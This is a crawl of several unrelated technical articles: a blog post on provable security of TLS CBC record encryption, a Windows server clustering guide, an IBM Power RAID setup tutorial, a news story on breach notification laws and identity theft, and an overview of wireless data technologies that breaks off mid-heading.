This story, "Organizations Suffer SQL Injection Attacks, but Do Little to Prevent Them" was originally published by CSO. | <urn:uuid:274f46a5-3bf3-4555-b9fa-7ab037998926> | CC-MAIN-2017-09 | http://www.cio.com/article/2377067/security0/organizations-suffer-sql-injection-attacks--but-do-little-to-prevent-them.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00486-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.967505 | 606 | 2.546875 | 3 |
The goal of this series is to try to answer an age-old question that is often asked and rarely answered. Namely: is the TLS protocol provably secure?
While I find the question interesting in its own right, I hope to convince you that it’s of more than academic interest. TLS is one of the fundamental security protocols on the Internet, and if it breaks lots of other things will too. Worse, it has broken — repeatedly. Rather than simply patch and hope for the best, it would be fantastic if we could actually prove that the current specification is the right one.
Unfortunately this is easier said than done. In the first part of this series I gave an overview of the issues that crop up when you try to prove TLS secure. They come at you from all different directions, but most stem from TLS’s use of ancient, archaic cryptography; gems like, for example, the ongoing use of RSA-PKCS#1v1.5 encryption fourteen years after it was shown to be insecure.
Despite these challenges, cryptographers have managed to come up with a handful of nice security results on portions of the protocol. In the previous post I discussed Jonnson and Kaliski’s proof of security for the RSA-based TLS handshake. This is an important and confidence-inspiring result, given that the RSA handshake is used in almost all TLS connections.
In this post we’re going to focus on a similarly reassuring finding related to the the TLS record encryption protocol — and the ‘mandatory’ ciphersuites used by the record protocol in TLS 1.1 and 1.2 (nb: TLS 1.0 is broken beyond redemption). What this proof tells us is that TLS’s CBC mode ciphersuites are secure, assuming… well, a whole bunch of things, really.
The bad news is that the result is extremely fragile, and owes its existence more to a series of happy accidents than from any careful security design. In other words, it’s just like TLS itself.
Records and handshakes
Let’s warm up with a quick refresher.
TLS is a layered protocol, with different components that each do a different job. In the previous post I mostly focused on the handshake, which is a beefed-up authenticated key agreement protocol. Although the handshake does several things, its main purpose is to negotiate a shared encryption key between a client and a server — parties who up until this point may be complete strangers.
The handshake gets lots of attention from cryptographers because it’s exciting. Public key crypto! Certificates! But really, this portion of the protocol only lasts for a moment. Once it’s done, control heads over to the unglamorous record encryption layer which handles the real business of the protocol: securing application data.
Most kids don’t grow up dreaming about a chance to work on the TLS record encryption layer, and that’s fine — they shouldn’t have to. All the record encryption layer does is, well, encrypt stuff. In 2012 that should be about as exciting as mailing a package.
And yet TLS record encryption still manages to be a source of endless excitement! In the past year alone we’ve seen three critical (and exploitable!) vulnerabilities in this part of TLS. Clearly, before we can even talk about the security of record encryption, we have to figure out what’s wrong with it.
Welcome to 1995
|Development of the SSLv1
record encryption layer
The problem (again) is TLS’s penchant for using prehistoric cryptography, usually justified on some pretty shaky ‘backwards compatibility‘ grounds. This excuse is somewhat bogus, since the designers have actually changed the algorithms in ways that break compatibility with previous versions — and yet retained many of the worst features of the originals.
The most widely-used ciphersuites employ a block cipher configured in CBC mode, along with a MAC to ensure record authenticity. This mode can be used with various ciphers/MAC algorithms, but encryption always involves the following steps:
- If both sides support TLS compression, first compress the plaintext.
- Next compute a MAC over the plaintext, record type, sequence number and record length. Tack the MAC onto the end of the plaintext.
- Pad the result with up to 256 bytes of padding, such that the padded length is a multiple of the cipher’s block size. The last byte of the padding should contain the padding length (excluding this byte), and all padding bytes must also contain the same value. A padded example (with AES) might look like:
0x MM MM MM MM MM MM MM MM MM 06 06 06 06 06 06 06
- Encrypt the padded message using CBC mode. In TLS 1.0 the last block of the previous ciphertext (called the ‘residue’) is used as the Initialization Vector. Both TLS 1.1 and 1.2 generate a fresh random IV for each record.
To get an idea of what’s wrong with the CBC ciphersuite, you can start by looking at the appropriate section of the TLS 1.2 spec — which reads more like the warning label on a bottle of nitroglycerin than a cryptographic spec. Allow me sum up the problems.
First, there’s the compression. It’s long been known that compression can leak information about the contents of a plaintext, simply by allowing the adversary to see how well it compresses. The CRIME attack recently showed how nasty this can get, but the problem is not really news. Any analysis of TLS encryption begins with the assumption that compression is turned off.
So ok: no TLS 1.0, no compression. Is that all?
Well, we still haven’t discussed the TLS MAC, which turns out to be in the wrong place — it’s applied before the message is padded and encrypted. This placement can make the protocol vulnerable to padding oracle attacks, which (amazingly) will even work across handshakes. This last fact is significant, since TLS will abort the connection (and initiate a new handshake) whenever a decryption error occurs in the record layer. It turns out that this countermeasure is not sufficient.
To deal with this, recent versions of TLS have added the following patch: they require implementers to hide the cause of each decryption failure — i.e., make MAC errors indistinguishable from padding failures. And this isn’t just a question of changing your error codes, since clever attackers can learn this information by measuring the time it takes to receive an error. From the TLS 1.2 spec:
In general, the best way to do this is to compute the MAC even if the padding is incorrect, and only then reject the packet. For instance, if the pad appears to be incorrect, the implementation might assume a zero-length pad and then compute the MAC. This leaves a small timing channel, since MAC performance depends to some extent on the size of the data fragment, but it is not believed to be large enough to be exploitable.
To sum up: TLS is insecure if your implementation leaks the cause of a decryption error, but careful implementations can avoid leaking much, although admittedly they probably will leak some — but hopefully not enough to be exploited. Gagh!
At this point, just take a deep breath and say ‘all horses are spherical‘ three times fast, cause that’s the only way we’re going to get through this.
Accentuating the positive
Having been through the negatives, we’re almost ready to say nice things about TLS. Before we do, let’s just take a second to catch our breath and restate some of our basic assumptions:
- We’re not using TLS 1.0 because it’s broken.
- We’re not using compression because it’s broken.
- Our TLS implementation is perfect — i.e., doesn’t leak any information about why a decryption failed. This is probably bogus, yet we’ve decided to look the other way.
- Oh yeah: we’re using a secure block cipher and MAC (in the PRP and PRF sense respectively).**
And now we can say nice things. In fact, thanks to a recent paper by Kenny Paterson, Thomas Ristenpart and Thomas Shrimpton, we can say a few surprisingly positive things about TLS record encryption.
What Paterson/Ristenpart/Shrimpton show is that TLS record encryption satisfies a notion they call ‘length-hiding authenticated encryption‘, or LHAE. This new (and admittedly made up) notion not only guarantees the confidentiality and authenticity of records, but ensures that the attacker can’t tell how long they are. The last point seems a bit extraneous, but it’s important in the case of certain TLS libraries like GnuTLS, which actually add random amounts of padding to messages in order to disguise their length.
There’s one caveat to this proof: it only works in cases where the MAC has an output size that’s greater or equal to the cipher’s block size. This is, needless to say, a totally bizarre and fragile condition for the security of a major protocol to hang on. And while the condition does hold for all of the real TLS ciphersuites we use — yay! — this is more a happy accident than the result of careful design on anyone’s part. It could easily have gone the other way.
So how does the proof work?
Good question. Obviously the best way to understand the proof is to read the paper itself. But I’d like to try to give an intuition.
First of all, we can save a lot of time by starting with the fact that CBC-mode encryption is already known to be IND-CPA secure if implemented with a secure block cipher (PRP). This result tells us only that CBC is secure against passive attackers who can request the encryption of chosen messages. (In fact, a properly-formed CBC mode ciphertext should be indistinguishable from a string of random bits.)
The problem with plain CBC-mode is that these security results don’t hold in cases where the attacker can ask for the decryption of chosen ciphertexts.
This limitation is due to CBC’s malleability — specifically, the fact that an attacker can tamper with a ciphertext, then gain useful information by sending the result to be decrypted. To show that TLS record encryption is secure, what we really want to prove is that tampering gives no useful results. More concretely, we want to show that asking for the decryption of a tampered ciphertext will always produce an error.
We have a few things working in our favor. First, remember that the underlying TLS record has a MAC on it. If the MAC is (PRF) secure, then any ciphertext tampering that results in a change to this record data or its MAC will be immediately detected (and rejected) by the decryptor. This is good.
Unfortunately the TLS MAC doesn’t cover the padding. To continue our argument, we need to show that no attacker can produce a legitimate ciphertext, and that includes tampering that messes with the padding section of the message. Here again things look intuitively good for TLS. During decryption, the decryptor checks the last byte of the padded message to see how much padding there is, then verifies that all padding bytes contain the same numeric value. Any tampering that affects this section of the plaintext should either:
- Produce inconsistencies in some padding bytes, resulting in a padding error, or
- Cause the wrong amount of padding to be stripped off, resulting in a MAC error.
This all seems perfectly intuitive, and you can imagine the TLS developers making exactly this argument as they wrote up the spec. However there’s one small exception to the rule above, which can turn TLS implementations that add an unnecessarily large amount of padding to the plaintext. (For example, GnuTLS.)
To give an example, let’s say the unpadded record + MAC is 15 bytes. If we’re using AES, then this plaintext can be padded with a single byte. Of course, if we’re inclined to add extra padding, it could also be padded with seventeen bytes — both are valid padding strings. The two possible paddings are presented below:
You see, if TLS MACs are always bigger than a ciphertext block, then all messages will obey a strict rule: no padding will ever appear in the first block of the CBC ciphertext.
Since the padding is now guaranteed to start in the second (or later) block of the CBC ciphertext, the attacker cannot ‘tweak’ it by modifying the IV (this attack only works against the first block of the plaintext). Instead, they would have to tamper with a ciphertext block. And in CBC mode, tampering with ciphertext blocks has consequences! Such a tweak will allow the attacker to change padding bytes, but as a side effect it will cause one entire block of the record or MAC to be randomized when decrypted. And what Paterson/Ristenpart/Shrimpton prove is that this ‘damage’ will inevitably lead to a MAC error.
This ‘lucky break’ means that an attacker can’t successfully tamper with a CBC-mode TLS ciphertext. And that allows us to push our way to a true proof of the CBC-mode TLS ciphersuites. By contrast, if the MAC was only 80 bits (as it is in some IPSEC configurations), the proof would not be possible. So it goes.
Now I realize this has all been pretty wonky, and that’s kind of the point! The moral to the story is that we shouldn’t need this proof in the first place! What it illustrates is how fragile and messy the TLS design really is, and how (once again) it achieves security by luck and the skin of its teeth, rather than secure design.
What about stream ciphers?
The good news — to some extent — is that none of the above problems apply to stream ciphers, which don’t attempt to hide the record length, and don’t use padding in the first place. So the security of these modes is much ‘easier’ to argue.
There’s probably a lot more that can be said about TLS record encryption, but really… I think this post is probably more than anyone (outside of the academic community and a few TLS obsessives) has ever wanted to read on the subject.
* One thing I don’t mention in this post is the TLS 1.0 ’empty fragment’ defense, which actually works against BEAST and has been deployed in OpenSSL for several years. The basic idea is to encrypt an empty record of length 0 before each record goes over the wire. In practice, this results in a full record structure with a MAC, and prevents attackers from exploiting the residue bug. Although nobody I know of has ever proven it secure, the proof is relatively simple and can be arrived at using standard techniques.
** The typical security definition for a MACs is SUF-CMA (strongly unforgeable under chosen message attack). This result uses the stronger — but also reasonable — assumption that the MAC is actually a PRF. | <urn:uuid:5e63a805-27c0-48f5-9f4e-27536b905819> | CC-MAIN-2017-09 | https://blog.cryptographyengineering.com/2012/09/28/on-provable-security-of-tls-part-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170404.1/warc/CC-MAIN-20170219104610-00482-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.911127 | 3,241 | 2.5625 | 3 |
Configuring and Planning a Windows Server Cluster
In the first three installments of this series ( Is a Server Cluster Right for Your Organization? , Choosing the Cluster Type that's Right For You , and Network Load Balancing Clusters ), I discuss the concepts involved in setting up a server cluster. As I do, I discuss some of the differences between the Network Load Balancing (NLB) model and the server cluster model. In this final article in the series, I'll discuss the server cluster model in greater detail.
|"If you're the type who wants it all, you'll be happy to know that you can have high availability with load balancing. "|
A Quick Cluster Refresher
Just as a reminder, I'll take just a moment to describe what constitutes a server cluster. On a Windows network, a server cluster is a cluster of two or more machines running Windows 2000 Advanced Server that function as a single machine. Although the machines have separate CPUs and network cards, they are linked to a common storage unit--usually through a fiber channel or SCSI bus. If either unit were to fail, the other unit would keep running, thus providing continuous availability of the application the cluster is hosting.
Keep in mind that not all configurations keep the servers mirrored. Instead, the server cluster model relies on something called a fail-over policy. The fail-over policy dictates the behavior of the cluster during a failure situation. For example, suppose that the first CPU in a cluster were to fail. The fail-over policy on the second CPU would dictate which applications from the failed first CPU would temporarily run on the second CPU. The fail- over policy can also shut down non-critical services and applications on the functional CPU to make way for the extra load it must endure during a failure situation.
Configuring a Server Cluster
There are several different ways to configure a server cluster. Which method is right for you depends largely on what you're trying to accomplish. For example, are you more worried about high availability, load balancing, or both?
If you're the type who wants it all, you'll be happy to know that you can have high availability with load balancing. To do this, you'll have to set the cluster's policies to run some applications or services on one CPU and the remaining applications and services on the other CPU. You must then set the cluster's fail-over policy in such a way that if any of the applications or services fail, they will be run on the other CPU. Obviously, during a failure situation, the functional CPU may become bogged down, because it's performing twice the usual workload. Therefore, you might set the fail-over policy so that if either machine has to take over for a failed CPU, the unnecessary services or applications will be temporarily suspended until the failed unit comes back online. Although this method is tedious to configure, it provides a great mix of performance and availability.
If the idea of having a server bog down during a failure or the thought of shutting down unnecessary services bothers you, there are alternatives. One such alternative is to implement high availability without load balancing. In this implementation, one server basically runs everything. The other server in the cluster is on constant standby as a hot spare. If the first CPU fails, the fail-over policy shifts control of all applications and services to the second CPU. By using this method, your end users will probably never even notice when a problem occurs. When the failed CPU is brought back online, it takes over control of all of the services and applications, and the second CPU goes back into standby mode.
In the past, I've worked for several organizations in which management deemed one or two applications to be mission critical. In these environments, management never wanted to see a network failure of any kind; but if the network did fail, they really didn't care what failed, as long as those essential applications were still running.
In such environments, load shedding is a great configuration. This configuration is especially effective because it not only guarantees that the application will be available under any circumstances, it also ensures that the application's performance won't suffer because of a bogged-down server.
In the load-shedding model, the clustered servers each run their own set of applications, just as you normally would on two separate servers (remember that the cluster is still seen as a single server by the rest of the network). The only difference is that the fail- over policy defines the critical applications. Now, suppose that one of the CPUs fails. During this failure, the second CPU would detect the failure and look at the fail-over policy. The fail-over policy would then tell the CPU to shut down all non-essential applications and to begin servicing any essential applications that were previously running on the failed CPU.
Once you have an idea of which cluster model is right for your environment, you have a lot more planning to do. The first part of this process is to create an exhaustive list of your applications. This list should include things like the current location of each application, any dependencies related to the application, and just how critical the application is. For example, if you have a critical customer management program, you might list the place that the program currently resides and indicate that the program is dependant on the sales database running in the background. Therefore, you'd also want to document the location of the sales database and flag both the program and the underlying database as critical applications. If you're questioning the critical status of the database, consider that the customer management program is critical and can't run without the database; therefore, the database is also critical.
While determining dependencies, you must also look for applications that have common dependencies. For example, suppose that you have two applications that both depend on the same underlying database. Because of the dependency structure, these applications and their dependencies must always be grouped together.
Finally, when designing your fail-over policy, you must consider the impact of that policy. For starters, if you make the second server take over running a critical application, will all the dependencies be in place for the application to run? You must also consider hardware-related issues, such as whether the CPUs have a fast enough processor and enough memory to handle the fail-over policy that you've designed without crashing or bogging down. As you can see, setting up a cluster can be a great way to protect your data or to increase the speed of a Web site. In this article, I've explained the type of clustering environment that's suitable for both situations. //
Brien M. Posey is an MCSE who works as a freelance writer. His past experience includes working as the director of information systems for a national chain of health care facilities and as a network engineer for the Department of Defense. Because of the extremely high volume of e-mail that Brien receives, it's impossible for him to respond to every message, although he does read them all. | <urn:uuid:1c5c6baf-0f39-4239-ac83-34885929474b> | CC-MAIN-2017-09 | http://www.enterprisenetworkingplanet.com/print/netsysm/article.php/624431/Configuring-and-Planning-a-Windows-Server-Cluster.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170700.71/warc/CC-MAIN-20170219104610-00006-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949499 | 1,415 | 2.5625 | 3 |
Hardware RAID configuration on the IBM Power platform
RAID configuration on the IBM Power platform
RAID stands for Redundant Array of Independent Disks and it involves two key design goals: Increased data reliability and increased input/output (I/O) performance. When multiple physical disks are set up to use the RAID technology, they are said to be in a RAID array. This array distributes data across multiple disks, but the array is seen by the computer user and operating system as one single disk. RAID can be set up to serve several different purposes.
Different types of RAID levels
Different types of RAID levels are available. Some are basic RAID levels and some are a combination of basic levels.
- RAID 0
- RAID 1
- RAID 5
- RAID 6
- RAID 10
- RAID 50
- RAID 60
Here, RAID 0, RAID 1, and RAID 5 are the basic RAID levels and the remaining RAID 6, RAID 10, RAID 50, and RAID 60 are the combination of the basic RAID levels.
Each RAID level is defined for a specific purpose. Read through the following table to get a better understanding about the various RAID levels.
|RAID level||Minimum drives||Protection||Description||Strengths||Weakness|
|RAID 0||2||None||Data striping without redundancy||Highest performance||No data protection; If one drive fails, all data is lost|
|RAID 1||2||Single drive failure||Disk mirroring||Very high performance; Very high data protection; Very good on write performance||High redundancy cost overhead; Because all data is duplicated, twice the storage capacity is required|
|RAID 5||3||Single drive Failure||Block-level data striping with distributed parity|| Best
cost/performance for transaction-oriented networks; Very high
performance, very high data protection; Supports multiple
simultaneous reads and writes; Can also be optimized for
large, sequential requests||Write performance is slower than RAID 0 or RAID 1|
|RAID 6||4||Two-drive failure||Same as RAID 5 with double distributed parity across an extra drive||Offers solid performance with the additional fault tolerance of allowing availability to data if two disks in a RAID group is to fail;Is recommended to use more drives in RAID group to make up for performance and disk utilization hits compared to RAID 5||Must use a minimum of five drives with two of them used for parity, so disk utilization is not as high as RAID 3 or RAID 5. Performance is slightly lower than RAID 5|
|RAID 10||4||One disk per mirrored stripe (not same mirror)||Combination of RAID 0 (data striping) and RAID 1 (mirroring)||Highest performance, highest data protection (can tolerate multiple drive failures)||High redundancy cost overhead; Because all data is duplicated, twice the storage capacity is required; Requires minimum of four drives|
|RAID 50||6||One disk per mirrored stripe||Combination of RAID 0 (data striping) and RAID 5 (single parity drive)||Highest performance, highest data protection (can tolerate multiple drive failures)||High redundancy cost overhead; Because all data is duplicated, twice the storage capacity is required; Requires minimum of four drives|
|RAID 60||8||Two disks per mirrored stripe||Combination of RAID 0 (data striping) and RAID 6 (dual-parity drives)||Highest performance, highest data protection (can tolerate multiple drive failures)||High redundancy cost overhead; Because all data is duplicated, twice the storage capacity is required; Requires minimum of four drives|
Supported RAID levels in IBM Power platforms
The following RAID levels are supported by IBM Power hardware.
- RAID 0
- RAID 5
- RAID 6
- RAID 10
Configuring RAID on the Power platform
Perform the following steps to configure RAID 5 on the Power platform.
- Get the supported diagnostics CD for the specific hardware. Here
I'm going to configure RAID on the Power platform; hence I have
used the following media.
Version 22.214.171.124 (For selected Power/PowerPC based systems)
- Create the logical partition (LPAR) by assigning the RAID controller to it. Note that we can not merge two or more disk controllers for a single RAID array configuration.
- Start the LPAR with the diagnostics CD.
- Type 2 and then press Enter, as mentioned in the console screen.
- Press Enter to continue.
- On the FUNCTION SELECTION page, select the third option.
- Enter the terminal type, preferably vt100 and press Enter.
- From the tasks selection list, select RAID Array Manager and press Enter.
- From the list of available disk controllers, select an appropriate disk array manager and press Enter.
- In the disk array manager, we can get different options for different operations, such as listing, creating, deleting and so on. Select List SAS Disk Array Configuration.
- Then, select the appropriate RAID adapter. To do so, move the
cursor to the required option and press Esc+7.
A list of disks that is available in the selected controller is displayed.
- Now, press F3 to move back to the main screen. Then, select the Create an Array Candidate pdisk and Format to 528 Byte Sectors option and press Enter. It is mandatory to create an array candidate.
- Select the Small Computer System Interface (SCSI) controller for selecting disks to create array candidates.
- Press F7 or Esc+7 to mark the disks as an array candidate.
- After selecting the disk, press Enter to begin formatting.
- Press Enter to continue.
- Now, create the array using the array candidates.
- Select the required RAID level. In this example, I've selected RAID 5.
- Select the stripe size (256 Kb is the default and recommended) and press Enter.
- Select the array candidates on which to create RAID and press Enter.
- After your configuration is complete, press Enter. The following screen is displayed.
- Now we are ready with the RAID configuration. Press F3 to go to the main screen.
- For checking the array configuration status, select List
SAS Disk Array Configuration.
After the hdisk is available, it is ready for use by assigning it to any LPAR.
General usage of this setup
This kind of setup is mainly for hardware redundancy with respect to disks.
- Hardware data redundancy with RAID 5 is more stable than the OS-level mirroring.
- This setup is best suited when we assign a disk from Virtual I/O Server (VIOS) to many LPARs.
- No need to configure the OS-level mirror in all LPARs. | <urn:uuid:c031ab23-495c-4654-b5a8-e9af8f31adf9> | CC-MAIN-2017-09 | http://www.ibm.com/developerworks/aix/tutorials/au-aix-raid/index.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170700.71/warc/CC-MAIN-20170219104610-00006-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.788364 | 1,419 | 3.21875 | 3 |
Over the past five years, 43 U.S. states have adopted data breach notification laws, but has all of this legislation actually cut down on identity theft? Not according to researchers at Carnegie Mellon University who have published a state-by-state analysis of data supplied by the U.S. Federal Trade Commission (FTC).
"There doesn't seem to be any evidence that the laws actually reduce identity theft," said Sasha Romanosky, a Ph.D student at Carnegie Mellon who is one of the paper's authors.
Romanosky's team took a state-by-state look at FTC identity theft complaints filed between 2002 and 2006 to see whether there was a noticeable impact on complaints in states that had adopted data breach notification laws such as California's SB 1386, which compels companies and institutions to notify state residents when their personal information has been lost or stolen. Their paper is set to be presented at a conference on Information Security Economics held at Dartmouth College later this month.
Since 1999 the FTC has invited identity theft victims to log information about their cases on its Web site. The data are then made accessible to law enforcement, which uses the information to help analyze crime trends. A lot of people complain, but it represents only a subsection of all identity theft cases. In 2006, for example, the FTC logged 246,035 identity theft complaints, while a Javelin Strategy survey estimated that there were 8.9 million ID theft victims that year.
The FTC doesn't break down identity theft complaints on a state-by-state basis. However, the Carnegie Mellon researchers were able to access to this information using a Freedom of Information Act request. This allowed them to see whether or not there was a change in the rate of reported identity thefts before and after data breach laws went on the books. Looking at the complaints on a month-by-month basis, they didn't find any statistically significant effect, Romanosky said.
However, they found that other factors, such as the state's population, gross domestic product and fraud rate did have a significant effect on identity theft rates.
Because reports to the FTC are incomplete, it's hard to draw conclusions from the data, said Gartner analyst Avivah Litan. But she noted that while breach laws have made lost laptops front-page news, many companies have responded to tighter laws and regulations by focusing more on compliance than on security.
Often, that's not good enough to protect customers from ID theft, she said. "If you just meet the letter of the law you may pass an audit, but you have to pass the spirit of the law."
Romanosky admits that there may be problems in the methodology used by his team. And while he noted that the data -- compiled from self-reported complaints -- may not be perfect, the FTC database is the only source of this type of information.
In fact, there may be good reasons that explain why breach laws have not cut down on identity theft. Many consumers simply ignore breach notification letters. And Romanosky believes that security firms are still not doing enough to protect data themselves. "In so many of these cases, the breaches occur because of ridiculous security practices," he said.
Romanosky knows something about information security in the corporate world. Before deciding to pursue his Ph.D, he worked in the security groups of companies such as Morgan Stanley and eBay.
The researchers suggest a few next steps to better understand identity theft. The federal government should adopt a unified breach law in order to "reduce conflict between states laws and lower the barrier for compliance," they write in their paper.
Also, there should be standardized notification requirements so that victims learn pertinent information about the breach. Finally, they said that some kind of oversight committee should be set up as the definitive source of breach data, so that there is better information for consumers, policy makers, and researchers.
Gartner's Litan offered one more observation that might explain Carnegie Mellon's findings: The fraudsters are also getting better at what they do, she added. "If you talk to the largest banks, they will tell you that fraud has really increased in the past 18 months," she said. "And they project it going up very significantly in the next two years."
"The thieves are just getting better and there's more fraud," she said. | <urn:uuid:fa242bb7-5eef-42a4-9c1c-f7f5b14080e3> | CC-MAIN-2017-09 | http://www.csoonline.com/article/2122802/identity-theft-prevention/researchers--notification-laws-not-lowering-id-theft.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00534-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.968134 | 885 | 2.546875 | 3 |
Chip-and-PIN refers to the use of a chip-based bankcards and a mandatory PIN entry for credit and debit card payments. The term was was coined in the United Kingdom and is the government-backed initiative to implement the EMV standard for secure payments in the UK. Though people commonly call it chip-and-PIN, the technical term is EMV. It’s a global technology specification for payment adopted by MasterCard, Visa, JCB and American Express. It ensures that chip cards work with point-of-sale terminals and ATMs from country to country, to authenticate credit and debit card transactions. The PIN adds another layer of security.
EMV payment cards are used in many areas of the world and contain chips, or tiny computers, that make transactions safer and prevent counterfeit fraud. More than 80 countries globally use EMV chip cards and they are accepted at more than 20 million terminals worldwide. In the United States, American Express, Discover, MasterCard and Visa have all announced roadmaps to move the payments industry to EMV chip cards. | <urn:uuid:7c8c15ae-dacf-44bc-afa5-708ddcec9875> | CC-MAIN-2017-09 | https://www.justaskgemalto.com/en/what-is-chip-and-pin/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00234-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94738 | 218 | 3.375 | 3 |
Wireless technology has exploded in the last several years, and it provides an expanding array of technology choices. Wireless technology refers to the transmission and receipt of information (voice, fax, data) using radio frequency (RF) energy. It can be point-to-point, analogous to telephone or leased-circuit connections, or broadcast, such as commercial television and radio.
However, not all commercial wireless technologies are for government users, and a few are only now becoming viable in this regard. For both voice and data, wireless networks are merely an extension of wired networks from the user perspective. Within the context of government users and applications, what follows are several of the most pervasive and applicable wireless technologies available today and a brief glimpse at some promising technologies for tomorrow.
Specialized Mobile Radio (SMR)
The Federal Communications Commission (FCC) established specialized mobile radio (SMR) services in the mid-1970s by allocating a portion of the 800MHz frequency band for private land mobile-radio systems. SMR networks are operated by commercial system providers. Types of services provided include voice radio networks (including dispatch service), mobile packet data networks, and telephone and paging services. Initially developed around interstate highways and population centers, some of these networks have extended their service to include outlying areas. The main differentiators for SMR networks are transmission speed, transmission protocols, coverage areas and cost.
SMRs specializing in data communications typically use a packet-switching protocol. Data is segmented and routed in discrete data envelopes called "packets," each with its own control information for routing, sequencing and error checking. Packet switching allows a communications channel to be shared by multiple users, each using the circuit only for the time required to transmit a single packet. Users are able to maintain a continuous connection to the network without permanently tying up a channel.
Some advantages and disadvantages of SMR systems are summarized below:
Specialized Mobile Radio
* Cellular-style roaming through out coverage area
* Easy access to public switched telephone network
*Supports short, frequent messages well (e.g., data inquiries, text mes-sages)
*Services designed specifically for data
*Coverage lacking in less-populated areas
*Priority access to regular telephone networks not available for government users
*Potentially significant ongoing costs for usage fees
*Does not support sustained data transfers well (e.g., long reports, images)
Today, over 80 percent of the customers who subscribe to SMR services are in the construction, service or transportation industries. However, over the last 10 years, SMR network providers have increased their marketing efforts to public agencies.
Spread spectrum is a modulation technique that takes an input signal, mixes it with frequency modulated (FM) noise and "spreads" the signal over a broad frequency range. The signal then hops from frequency to frequency at defined intervals, resulting in the spread signal having greater bandwidth than the original
message. Spread-spectrum receivers
have unique user codes to recognize, acquire and "de-spread" a spread signal, thus returning the signal to the original message.
Popularly available spread-spectrum data networks use a mesh topology of shoebox-size radio transceivers (microcell radios), which are mounted to streetlights or utility poles. These microcells are strategically placed every quarter- to half-mile in a checkerboard pattern. Each microcell radio employs multiple-frequency-hopping channels and uses a randomly selected hopping sequence. Frequency hopping allows for a very secure network. These types of networks use digital-packet-switched protocols similar to that employed by SMRs.
Microcells transmit messages to wired access points (WAPs). WAPs convert the data packets into a format for transmission to a wired Internet protocol network backbone. Each WAP and the microcells that report to it can support thousands of subscribers.
The major spread-spectrum data provider is Metricom. Its system transmits data at a raw speed of 100 kilobits per second (Kbps), with a throughput averaging 28.8Kbps. Planned system upgrades will increase throughput up to 40Kbps using existing radio modems. Metricom also plans to offer service with throughput up to 128Kbps This service will use spectrum in the 2.3GHz
range and will require a radio modem upgrade.
Some advantages and disadvantages of spread-spectrum systems are summarized below:
Spread Spectrum Systems
* High bandwidth
* Secure communications
* Low initial cost
* Easy for provider to expand coverage
* Limited availability for wide area
* Must be quasi-stationary to use
* Recurring monthly costs
By most estimates, more than 90
percent of traffic on the U.S. cellular telephone network is voice, but data transmissions are increasing rapidly. In 1995, there were approximately 1 million wireless-data users, with the market projected to grow to nearly 10 million users by the year 2000.
While its popularity and coverage has expanded since Advanced Mobile Phone Service (AMPS) was introduced in the 1960s, analog cellular radio is still the base technology used for cellular service today. There are currently two methods for sending data over cellular networks: cellular digital packet data (CDPD) and cellular switched-circuit data (CSCD). Each has distinct advantages depending on the type of application, amount of data to send or receive, and geographic coverage needs.
CDPD is currently available to roughly 50 percent of the population base. Two methods to transmit data are used, depending upon the service provider's network architecture. Some providers have radio channels dedicated to data transmission installed at existing voice cellular sites. Others use voice cellular channels and interleave data messages within the unused portion of voice radio signals. To use a CDPD data service, users require a laptop computer, a connector cable and a CDPD radio modem. Radio modems come in a PC-card format or connect to the user device with a serial cable.
Regardless of the method used, messages are broken up into discrete packets of data and transmitted continuously over the network. Messages are then "reassembled" into the original message at the receiving device. This technology supports roaming and is especially attractive for multicast (e.g., one-to-many) service, allowing updates to be periodically broadcast to all users. Users log on once per day to register on the network. Messages and transmissions automatically locate them.
CDPD supports TCP/IP and is most appropriate for short bursts of data,
such as e-mail, credit-card authorization or database queries. Currently, CDPD provides data rates of 19.2Kbps with throughput averaging 14.4Kbps. Next-generation systems will allow data rates
Nationwide, approximately 45 percent of CDPD agencies are in public safety. Many of these users are using the service as an adjunct to their existing private mobile-data systems. Typical applications include database inquiry, automated field reporting and unit-to-unit messaging. Although there are only limited examples of use in public safety, CDPD does provide the capability for electronic dispatch of units.
Major CDPD providers generally have roaming agreements to allow users to access the service when outside their home coverage area.
Some advantages and disadvantages of CDPD systems are summarized below:
Cellular Digital Packet Data
* Supports short, frequent messages well
* Inexpensive end-user equipment
* Available today
* Protocol provides easy access to the Internet
* Transparent roaming available
* Moderate data rates (19.2Kbps)
* Secure (data encryption provided by carrier)
* Service in major population areas
* System designed for data
* Not yet fully deployed
* Coverage not available in less-populated areas
* Priority access not available for government users
* Potentially significant ongoing costs
* Newer technology
* Does not support sustained data transfers well
Cellular switched-circuit data is today's most popular and widely available option for wireless data transfer. It creates a dedicated connection or circuit over the analog cellular network only for the duration of the call, in contrast to the dedicated connection provided by a packet-switched network. Transfer rates are up to 14.4Kbps. Transferring data with CSCD requires a laptop computer, data-capable cellular telephone, a connector cable and a cellular modem (typically a PC card).
As with voice service, charges are determined by the duration of calls, making CSCD cost-effective for larger data transmissions with file transfer, fax and e-mail applications. Cellular switched-circuit data is a good approach for session-based interactive transactions, such as logging onto a host
application or accessing a private intranet. CSCD networks are low security but can be improved through user-provided encryption applications. CSCD is compatible with most off-the-shelf modem software. Since this service is available wherever analog cellular service is available, there is a variety of service providers.
Some advantages and disadvantages of CSCD systems are summarized below:
Cellular Switched-Circuit Data (CSCD)
* Inexpensive and easy-to-use user devices
* Transparent roaming
* Service in major population areas (covers 90 percent to 95 percent of population base)
* Supports sustained data transfers well
* Voice and data capabilities
* Extensive applications software
* Good developer support
*Dial-up connection required for each data message
*Does not support short, frequent messages well
*Priority access not available to government users
*Potentially significant ongoing costs
*Reliability (transmissions can drop when moving between calls)
*Roaming can be expensive
*Security (data encryption is an add-on)
Personal Communications Systems
